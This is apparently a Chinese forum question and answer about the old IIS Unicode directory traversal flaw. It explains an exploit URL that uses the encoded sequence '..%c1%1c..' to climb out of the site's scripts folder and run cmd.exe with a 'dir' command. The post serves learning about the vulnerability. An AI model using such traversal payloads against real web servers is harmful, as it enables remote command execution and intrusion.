关于unicode编码漏洞,求教
http://xxxxxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这串url有几个地方看不懂,只知道大致是用命令行遍历文件夹
主要是这里..%c1%1c..,我知道%c1%1c是斜杠/的编码
但是整体放上去不明白http://x.x.x.x/scripts/../../winnt/system32/cmd.exe?/c+dir
还有就是那个scripts是否意味着只有scripts文件夹下的文件才能被访问,能否把scripts换成别的什么
[解决办法]
http://xxxxxx/scripts/..%c1%1c../winnt/system32 这个就是找到WINDOWS目录,比如这样就定位到了
c:\winnt\system32\
然后执行cmd.exe
scripts 是当前网站下的一个目录